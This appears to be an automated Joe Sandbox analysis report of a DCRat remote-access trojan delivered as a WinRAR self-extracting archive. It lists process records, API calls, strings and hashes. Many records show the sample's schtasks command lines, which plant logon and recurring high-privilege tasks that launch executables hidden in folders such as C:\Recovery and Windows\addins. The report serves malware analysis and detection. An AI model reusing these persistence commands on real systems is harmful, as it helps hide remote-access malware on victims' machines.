MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:07:04
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:07:05
Start date:	24/05/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Microsoft OneDrive\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	05:07:06
Start date:	24/05/2024
Path:	C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
Imagebase:	0x510000
File size:	1'257'984 bytes
MD5 hash:	A6A0FB77338508B4185FE94263AA2D0F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002ABC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002A52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002B5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002B75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001C.00000002.2883759214.0000000002951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 88%, ReversingLabs Detection: 68%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.1%
Total number of Nodes:	1505
Total number of Limit Nodes:	28

Executed Functions

Function 00D6D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00D600CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00D600E4
Part of subcall function 00D600CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D600F6
Part of subcall function 00D600CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D60127

Part of subcall function 00D69DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D69DAC

Part of subcall function 00D6A335: OleInitialize.OLE32(00000000), ref: 00D6A34E
Part of subcall function 00D6A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6A385
Part of subcall function 00D6A335: SHGetMalloc.SHELL32(00D98430), ref: 00D6A38F

Part of subcall function 00D613B3: GetCPInfo.KERNEL32(00000000,?), ref: 00D613C4
Part of subcall function 00D613B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00D613D8

GetCommandLineW.KERNEL32 ref: 00D6D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D6D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D6D654
UnmapViewOfFile.KERNEL32(00000000), ref: 00D6D68E

Part of subcall function 00D6D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D6D29D
Part of subcall function 00D6D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6D2D9

CloseHandle.KERNEL32(00000000), ref: 00D6D697
GetModuleFileNameW.KERNEL32(00000000,00DADC90,00000800), ref: 00D6D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,00DADC90), ref: 00D6D6BE
GetLocalTime.KERNEL32(?), ref: 00D6D6C9
_swprintf.LIBCMT ref: 00D6D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D6D71A
GetModuleHandleW.KERNEL32(00000000), ref: 00D6D721
LoadIconW.USER32(00000000,00000064), ref: 00D6D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00D6D789
Sleep.KERNEL32(?), ref: 00D6D7B7
DeleteObject.GDI32 ref: 00D6D7F0
DeleteObject.GDI32(?), ref: 00D6D800
CloseHandle.KERNEL32 ref: 00D6D843

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00D6D6F9
winrarsfxmappingfile.tmp, xrefs: 00D6D637
sfxname, xrefs: 00D6D6B9
C:\Users\user\Desktop, xrefs: 00D6D5E9
STARTDLG, xrefs: 00D6D77E
sfxstime, xrefs: 00D6D715

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-3743209390
Opcode ID: 0f1d7fdd9c6a5c446f014503faf2d53a401bebeb1e4715d8f6a01fdf57c80134
Instruction ID: 1a509ebd963b9f7b97e49385af88a5d2e2317ec243a3b04e2edd45d2c3de5d2c
Opcode Fuzzy Hash: 0f1d7fdd9c6a5c446f014503faf2d53a401bebeb1e4715d8f6a01fdf57c80134
Instruction Fuzzy Hash: A061A271A04341AFD320AFA5EC49F2A3BA9EF46B45F040529F949D3391DB74D904DBB2

Function 00D69E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00D6AE4D,PNG,?,?,?,00D6AE4D,00000066), ref: 00D69E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E46
LoadResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E59
LockResource.KERNEL32(00000000,?,?,?,00D6AE4D,00000066), ref: 00D69E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D6AE4D,00000066), ref: 00D69E82
GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D6AE4D,00000066), ref: 00D69E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D69EFC
GlobalUnlock.KERNEL32(00000000), ref: 00D69F1B
GlobalFree.KERNEL32(00000000), ref: 00D69F22

Strings

PNG, xrefs: 00D69E1F

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: ba270fca1980e1b6a53bb04e31d8e846886467b5e1efc0b5fe5e4031f9ab4f88
Instruction ID: 72b2e11907fda1fa0f51d0695c493079846d809dfdf1e81b42d3802e19cb6b24
Opcode Fuzzy Hash: ba270fca1980e1b6a53bb04e31d8e846886467b5e1efc0b5fe5e4031f9ab4f88
Instruction Fuzzy Hash: FA315C71214706AFC7119F61EC58A2BBBADFF89B51B090529F906D6361EB32DC00CBB1

Function 00D5A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A692
GetLastError.KERNEL32(?,?,?,?,00D5A4EF,000000FF,?,?), ref: 00D5A69E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 5865b7273cc539e4622c9ef4f6fd81f04c0d36c10ad24431bb4fea33b47dc115
Instruction ID: abec75cfdc9389474d3889e807c09c012102f381287c08ca3d316351104225b7
Opcode Fuzzy Hash: 5865b7273cc539e4622c9ef4f6fd81f04c0d36c10ad24431bb4fea33b47dc115
Instruction Fuzzy Hash: 55418475504755AFC720EF68C884ADAF7E8FF48351F040A2AFDA9D3200D734A9588B72

Function 00D7753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002,00000000), ref: 00D7755E
TerminateProcess.KERNEL32(00000000,?,00D77513,00000000,00D8BAD8,0000000C,00D7766A,00000000,00000002,00000000), ref: 00D77565
ExitProcess.KERNEL32 ref: 00D77577

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4ff26d8b1d19578b7320ab3cc1e762e4137ddb795fc75fbb3305aa606fd97d7d
Instruction ID: 3d02ee31631594ffacb745253290e5f22d55969f7213d2c88cee167c17b421a4
Opcode Fuzzy Hash: 4ff26d8b1d19578b7320ab3cc1e762e4137ddb795fc75fbb3305aa606fd97d7d
Instruction Fuzzy Hash: D7E0B631014648ABCF11AF68DD09A593B69EB41B41F148814F90DCA222DB35DE42CB71

Function 00D5857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D58580
_memcmp.LIBVCRUNTIME ref: 00D58A08

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 3a2304a033a75d1611c8fc157fd3c249e3d0b2ca6b3c12c112c725aa60a583b3
Instruction ID: 7ced50f983d4101e80ef30efeb7a66fa4e14ce5b00587a9f883c7613dd569185
Opcode Fuzzy Hash: 3a2304a033a75d1611c8fc157fd3c249e3d0b2ca6b3c12c112c725aa60a583b3
Instruction Fuzzy Hash: AE822970904245AEDF25DB64C891BFABBB9EF15302F0C41BAEC59AB142DB315A4CDB70

Function 00D6AEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D6AEE5

Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

Strings

@, xrefs: 00D6B2A7
<, xrefs: 00D6B29A
"%s"%s, xrefs: 00D6B423
winrarsfxmappingfile.tmp, xrefs: 00D6B2BC
__tmp_rar_sfx_access_check_%u, xrefs: 00D6B1CB
C:\Users\user\Desktop, xrefs: 00D6B2DF
LICENSEDLG, xrefs: 00D6B771
STARTDLG, xrefs: 00D6AF04
-el -s2 "-d%s" "-sp%s", xrefs: 00D6B281

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-8108337
Opcode ID: 706041c9660f7b6cb2637430408e2efb956b74e42ab1805ef76fc1dda7c52cd8
Instruction ID: 1348ec826ef4081e031902e4093a0ec98a5aecca97ae71c7575933750754a0f0
Opcode Fuzzy Hash: 706041c9660f7b6cb2637430408e2efb956b74e42ab1805ef76fc1dda7c52cd8
Instruction Fuzzy Hash: FF42E271944344BFEB21ABA49C8AFBE7B7DEB02B11F040156F645E62D1CB744988CB72

Function 00D600CF Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00D600E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D600F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D60127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D603D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D603F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D60402
ReadFile.KERNEL32(00000000,?,00007FFE,00D83BA4,00000000), ref: 00D60421
CloseHandle.KERNEL32(00000000), ref: 00D60479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D6048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D604E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00D60510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00D6054A

Part of subcall function 00D60085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
Part of subcall function 00D60085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2

_swprintf.LIBCMT ref: 00D605BE
_swprintf.LIBCMT ref: 00D6060A

Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D

AllocConsole.KERNEL32 ref: 00D60612
GetCurrentProcessId.KERNEL32 ref: 00D6061C
AttachConsole.KERNEL32(00000000), ref: 00D60623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D60649
WriteConsoleW.KERNEL32(00000000), ref: 00D60650
Sleep.KERNEL32(00002710), ref: 00D6065B
FreeConsole.KERNEL32 ref: 00D60661
ExitProcess.KERNEL32 ref: 00D60669

Strings

SetDllDirectoryW, xrefs: 00D600F0
SetDefaultDllDirectories, xrefs: 00D60121
uxtheme.dll, xrefs: 00D6058B
kernel32, xrefs: 00D600DD
dwmapi.dll, xrefs: 00D60194, 00D60581
DXGIDebug.dll, xrefs: 00D60169, 00D604D3
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00D605F8

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
